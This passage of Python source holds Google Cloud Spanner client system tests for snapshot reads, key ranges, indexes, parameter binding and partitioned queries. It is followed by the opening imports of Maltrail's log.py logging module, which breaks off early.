rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
row_count = 40
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
row_count = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=ddl_statements + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
committed = self._set_up_table(row_count, database=temp_db)
with temp_db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index="contacts_by_last_name"
)
)
expected = list(
reversed([(row[0], row[2]) for row in self._row_data(row_count)])
)
self._check_rows_data(rows, expected)
def test_read_w_single_key(self):
# [START spanner_test_single_key_read]
row_count = 40
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(row_count))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
# [END spanner_test_single_key_read]
def test_empty_read(self):
# [START spanner_test_empty_read]
row_count = 40
self._set_up_table(row_count)
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, KeySet(keys=[(40,)])))
self._check_row_data(rows, [])
# [END spanner_test_empty_read]
def test_read_w_multiple_keys(self):
row_count = 40
indices = [0, 5, 17]
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(
snapshot.read(
self.TABLE,
self.COLUMNS,
KeySet(keys=[(index,) for index in indices]),
)
)
all_data_rows = list(self._row_data(row_count))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
row_count = 3000
limit = 100
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL, limit=limit))
all_data_rows = list(self._row_data(row_count))
expected = all_data_rows[:limit]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
row_count = 3000
start = 1000
end = 2000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
single_key = KeyRange(start_closed=[start], end_open=[start + 1])
keyset = KeySet(ranges=(single_key,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : start + 1]
self._check_rows_data(rows, expected)
closed_closed = KeyRange(start_closed=[start], end_closed=[end])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start : end + 1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[start], end_open=[end])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start:end]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[start], end_open=[end])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[start], end_closed=[end])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[start + 1 : end + 1]
self._check_row_data(rows, expected)
def test_read_partial_range_until_end(self):
row_count = 3000
start = 1000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[start:],
("start_closed", "end_open"): [],
("start_open", "end_closed"): all_data_rows[start + 1 :],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [start], end_arg: []}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_partial_range_from_beginning(self):
row_count = 3000
end = 2000
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
expected_map = {
("start_closed", "end_closed"): all_data_rows[: end + 1],
("start_closed", "end_open"): all_data_rows[:end],
("start_open", "end_closed"): [],
("start_open", "end_open"): [],
}
for start_arg in ("start_closed", "start_open"):
for end_arg in ("end_closed", "end_open"):
range_kwargs = {start_arg: [], end_arg: [end]}
keyset = KeySet(ranges=(KeyRange(**range_kwargs),))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
expected = expected_map[(start_arg, end_arg)]
self._check_row_data(rows, expected)
def test_read_with_range_keys_index_single_key(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start = 3
krange = KeyRange(start_closed=data[start], end_open=data[start + 1])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : start + 1])
def test_read_with_range_keys_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start : end + 1])
def test_read_with_range_keys_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start:end])
def test_read_with_range_keys_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end + 1])
def test_read_with_range_keys_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end = 3, 7
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
self.assertEqual(rows, data[start + 1 : end])
def test_read_with_range_keys_index_limit_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_closed=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start:end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_closed=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end + 1]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_index_limit_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
data = [[row[1], row[2]] for row in self._row_data(row_count)]
self._set_up_table(row_count)
start, end, limit = 3, 7, 2
krange = KeyRange(start_open=data[start], end_open=data[end])
keyset = KeySet(ranges=(krange,))
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, keyset, index="name", limit=limit)
)
expected = data[start + 1 : end]
self.assertEqual(rows, expected[:limit])
def test_read_with_range_keys_and_index_closed_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_closed = KeyRange(start_closed=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_closed_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
closed_open = KeyRange(start_closed=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(closed_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start:end]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_closed(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_closed = KeyRange(start_open=data[start], end_closed=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_closed,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end + 1]
self.assertEqual(rows, expected)
def test_read_with_range_keys_and_index_open_open(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
data = [[row[1], row[2]] for row in self._row_data(row_count)]
keyrow, start, end = 1, 3, 7
open_open = KeyRange(start_open=data[start], end_open=data[end])
keys = [data[keyrow]]
keyset = KeySet(keys=keys, ranges=(open_open,))
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, columns, keyset, index="name"))
expected = [data[keyrow]] + data[start + 1 : end]
self.assertEqual(rows, expected)
def test_partition_read_w_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
committed = self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
union = []
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
batches = batch_txn.generate_read_batches(
self.TABLE, columns, KeySet(all_=True), index="name"
)
for batch in batches:
p_results_iter = batch_txn.process(batch)
union.extend(list(p_results_iter))
self.assertEqual(union, expected)
batch_txn.close()
def test_execute_sql_w_manual_consume(self):
row_count = 3000
committed = self._set_up_table(row_count)
with self._db.snapshot(read_timestamp=committed) as snapshot:
streamed = snapshot.execute_sql(self.SQL)
keyset = KeySet(all_=True)
with self._db.snapshot(read_timestamp=committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, keyset))
self.assertEqual(list(streamed), rows)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(
self, database, sql, params, param_types, expected, order=True
):
if order and "ORDER" not in sql:
sql += " ORDER BY pkey"
with database.snapshot() as snapshot:
rows = list(
snapshot.execute_sql(sql, params=params, param_types=param_types)
)
self._check_rows_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.execute_sql(self.SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(self.SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
self._check_sql_results(
self._db,
sql=sql,
params=None,
param_types=None,
expected=[[[["a", 1], ["b", 2]]]],
)
def test_execute_sql_returning_empty_array_of_struct(self):
sql = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 2 AS C1) X "
"JOIN (SELECT 1 AS C2) Y "
"ON X.C1 = Y.C2 "
"ORDER BY C1 ASC)"
)
self._db.snapshot(multi_use=True)
self._check_sql_results(
self._db, sql=sql, params=None, param_types=None, expected=[[[]]]
)
def test_invalid_type(self):
table = "counters"
columns = ("name", "value")
valid_input = (("", 0),)
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, valid_input)
invalid_input = ((0, ""),)
with self.assertRaises(exceptions.FailedPrecondition):
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, invalid_input)
def test_execute_sql_select_1(self):
self._db.snapshot(multi_use=True)
# Hello, world query
self._check_sql_results(
self._db,
sql="SELECT 1",
params=None,
param_types=None,
expected=[(1,)],
order=False,
)
def _bind_test_helper(
self, type_name, single_value, array_value, expected_array_value=None
):
self._db.snapshot(multi_use=True)
# Bind a non-null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": single_value},
param_types={"v": Type(code=type_name)},
expected=[(single_value,)],
order=False,
)
# Bind a null <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": Type(code=type_name)},
expected=[(None,)],
order=False,
)
# Bind an array of <type_name>
array_type = Type(code=TypeCode.ARRAY, array_element_type=Type(code=type_name))
if expected_array_value is None:
expected_array_value = array_value
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": array_value},
param_types={"v": array_type},
expected=[(expected_array_value,)],
order=False,
)
# Bind an empty array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": []},
param_types={"v": array_type},
expected=[([],)],
order=False,
)
# Bind a null array of <type_name>
self._check_sql_results(
self._db,
sql="SELECT @v",
params={"v": None},
param_types={"v": array_type},
expected=[(None,)],
order=False,
)
def test_execute_sql_w_string_bindings(self):
self._bind_test_helper(TypeCode.STRING, "Phred", ["Phred", "Bharney"])
def test_execute_sql_w_bool_bindings(self):
self._bind_test_helper(TypeCode.BOOL, True, [True, False, True])
def test_execute_sql_w_int64_bindings(self):
self._bind_test_helper(TypeCode.INT64, 42, [123, 456, 789])
def test_execute_sql_w_float64_bindings(self):
self._bind_test_helper(TypeCode.FLOAT64, 42.3, [12.3, 456.0, 7.89])
def test_execute_sql_w_float_bindings_transfinite(self):
# Find -inf
self._check_sql_results(
self._db,
sql="SELECT @neg_inf",
params={"neg_inf": NEG_INF},
param_types={"neg_inf": param_types.FLOAT64},
expected=[(NEG_INF,)],
order=False,
)
# Find +inf
self._check_sql_results(
self._db,
sql="SELECT @pos_inf",
params={"pos_inf": POS_INF},
param_types={"pos_inf": param_types.FLOAT64},
expected=[(POS_INF,)],
order=False,
)
def test_execute_sql_w_bytes_bindings(self):
self._bind_test_helper(TypeCode.BYTES, b"DEADBEEF", [b"FACEDACE", b"DEADBEEF"])
def test_execute_sql_w_timestamp_bindings(self):
import pytz
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
timestamp_1 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 12, nanosecond=345612789
)
timestamp_2 = DatetimeWithNanoseconds(
1989, 1, 17, 17, 59, 13, nanosecond=456127893
)
timestamps = [timestamp_1, timestamp_2]
# In round-trip, timestamps acquire a timezone value.
expected_timestamps = [
timestamp.replace(tzinfo=pytz.UTC) for timestamp in timestamps
]
self._recurse_into_lists = False
self._bind_test_helper(
TypeCode.TIMESTAMP, timestamp_1, timestamps, expected_timestamps
)
def test_execute_sql_w_date_bindings(self):
import datetime
dates = [SOME_DATE, SOME_DATE + datetime.timedelta(days=1)]
self._bind_test_helper(TypeCode.DATE, SOME_DATE, dates)
@unittest.skipIf(USE_EMULATOR, "Skipping NUMERIC")
def test_execute_sql_w_numeric_bindings(self):
self._bind_test_helper(TypeCode.NUMERIC, NUMERIC_1, [NUMERIC_1, NUMERIC_2])
def test_execute_sql_w_query_param_struct(self):
name = "Phred"
count = 123
size = 23.456
height = 188.0
weight = 97.6
record_type = param_types.Struct(
[
param_types.StructField("name", param_types.STRING),
param_types.StructField("count", param_types.INT64),
param_types.StructField("size", param_types.FLOAT64),
param_types.StructField(
"nested",
param_types.Struct(
[
param_types.StructField("height", param_types.FLOAT64),
param_types.StructField("weight", param_types.FLOAT64),
]
),
),
]
)
# Query with null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": None},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (None, None, None, None)},
param_types={"r": record_type},
expected=[(None, None, None, None)],
order=False,
)
# Query with non-null struct, explicit type, nested NULL values
self._check_sql_results(
self._db,
sql="SELECT @r.nested.weight",
params={"r": (None, None, None, (None, None))},
param_types={"r": record_type},
expected=[(None,)],
order=False,
)
# Query with non-null struct, explicit type
self._check_sql_results(
self._db,
sql="SELECT @r.name, @r.count, @r.size, @r.nested.weight",
params={"r": (name, count, size, (height, weight))},
param_types={"r": record_type},
expected=[(name, count, size, weight)],
order=False,
)
# Query with empty struct, explicitly empty type
empty_type = param_types.Struct([])
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": ()},
param_types={"r": empty_type},
expected=[(False,)],
order=False,
)
# Query with null struct, explicitly empty type
self._check_sql_results(
self._db,
sql="SELECT @r IS NULL",
params={"r": None},
param_types={"r": empty_type},
expected=[(True,)],
order=False,
)
# Query with equality check for struct value
struct_equality_query = (
"SELECT " '@struct_param=STRUCT<threadf INT64, userf STRING>(1,"bob")'
)
struct_type = param_types.Struct(
[
param_types.StructField("threadf", param_types.INT64),
param_types.StructField("userf", param_types.STRING),
]
)
self._check_sql_results(
self._db,
sql=struct_equality_query,
params={"struct_param": (1, "bob")},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with nullness test for struct
self._check_sql_results(
self._db,
sql="SELECT @struct_param IS NULL",
params={"struct_param": None},
param_types={"struct_param": struct_type},
expected=[(True,)],
order=False,
)
# Query with null array-of-struct
array_elem_type = param_types.Struct(
[param_types.StructField("threadid", param_types.INT64)]
)
array_type = param_types.Array(array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": None},
param_types={"struct_arr_param": array_type},
expected=[],
order=False,
)
# Query with non-null array-of-struct
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_arr_param) a",
params={"struct_arr_param": [(123,), (456,)]},
param_types={"struct_arr_param": array_type},
expected=[(123,), (456,)],
order=False,
)
# Query with null array-of-struct field
struct_type_with_array_field = param_types.Struct(
[
param_types.StructField("intf", param_types.INT64),
param_types.StructField("arraysf", array_type),
]
)
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, None)},
param_types={"struct_param": struct_type_with_array_field},
expected=[],
order=False,
)
# Query with non-null array-of-struct field
self._check_sql_results(
self._db,
sql="SELECT a.threadid FROM UNNEST(@struct_param.arraysf) a",
params={"struct_param": (123, ((456,), (789,)))},
param_types={"struct_param": struct_type_with_array_field},
expected=[(456,), (789,)],
order=False,
)
# Query with anonymous / repeated-name fields
anon_repeated_array_elem_type = param_types.Struct(
[
param_types.StructField("", param_types.INT64),
param_types.StructField("", param_types.STRING),
]
)
anon_repeated_array_type = param_types.Array(anon_repeated_array_elem_type)
self._check_sql_results(
self._db,
sql="SELECT CAST(t as STRUCT<threadid INT64, userid STRING>).* "
"FROM UNNEST(@struct_param) t",
params={"struct_param": [(123, "abcdef")]},
param_types={"struct_param": anon_repeated_array_type},
expected=[(123, "abcdef")],
order=False,
)
# Query and return a struct parameter
value_type = param_types.Struct(
[
param_types.StructField("message", param_types.STRING),
param_types.StructField("repeat", param_types.INT64),
]
)
value_query = (
"SELECT ARRAY(SELECT AS STRUCT message, repeat "
"FROM (SELECT @value.message AS message, "
"@value.repeat AS repeat)) AS value"
)
self._check_sql_results(
self._db,
sql=value_query,
params={"value": ("hello", 1)},
param_types={"value": value_type},
expected=[([["hello", 1]],)],
order=False,
)
def test_execute_sql_returning_transfinite_floats(self):
with self._db.snapshot(multi_use=True) as snapshot:
# Query returning -inf, +inf, NaN as column values
rows = list(
snapshot.execute_sql(
"SELECT "
'CAST("-inf" AS FLOAT64), '
'CAST("+inf" AS FLOAT64), '
'CAST("NaN" AS FLOAT64)'
)
)
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0][0], float("-inf"))
self.assertEqual(rows[0][1], float("+inf"))
# NaNs cannot be compared by equality.
self.assertTrue(math.isnan(rows[0][2]))
# Query returning array of -inf, +inf, NaN as one column
rows = list(
snapshot.execute_sql(
"SELECT"
' [CAST("-inf" AS FLOAT64),'
' CAST("+inf" AS FLOAT64),'
' CAST("NaN" AS FLOAT64)]'
)
)
self.assertEqual(len(rows), 1)
float_array = rows[0][0]
self.assertEqual(float_array[0], float("-inf"))
self.assertEqual(float_array[1], float("+inf"))
# NaNs cannot be searched for by equality.
self.assertTrue(math.isnan(float_array[2]))
def test_partition_query(self):
row_count = 40
sql = "SELECT * FROM {}".format(self.TABLE)
committed = self._set_up_table(row_count)
# Paritioned query does not support ORDER BY
all_data_rows = set(self._row_data(row_count))
union = set()
batch_txn = self._db.batch_snapshot(read_timestamp=committed)
for batch in batch_txn.generate_query_batches(sql):
p_results_iter = batch_txn.process(batch)
# Lists aren't hashable so the results need to be converted
rows = [tuple(result) for result in p_results_iter]
union.update(set(rows))
self.assertEqual(union, all_data_rows)
batch_txn.close()
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
database = instance.database(DATABASE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable."
)
cls._db = database
def _verify_one_column(self, table_desc):
sql = "SELECT chunk_me FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = "SELECT chunk_me, chunk_me_2 FROM {}".format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = "key1"
KEY2 = "key2"
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]]
)
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
class FauxCall(object):
def __init__(self, code, details="FauxCall"):
self._code = code
self._details = details
def initial_metadata(self):
return {}
def trailing_metadata(self):
return {}
def code(self):
return self._code
def details(self):
return self._details
|
log.py | #!/usr/bin/env python2
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
import os
import re
import signal
import socket
import SocketServer
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import VERSION
from core.ignore import ignore_event
_condensed_events = {}
_condensing_thread = None
_condensing_lock = threading.Lock()
_thread_data = threading.local()
def create_log_directory():
if not os.path.isdir(config.LOG_DIR):
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
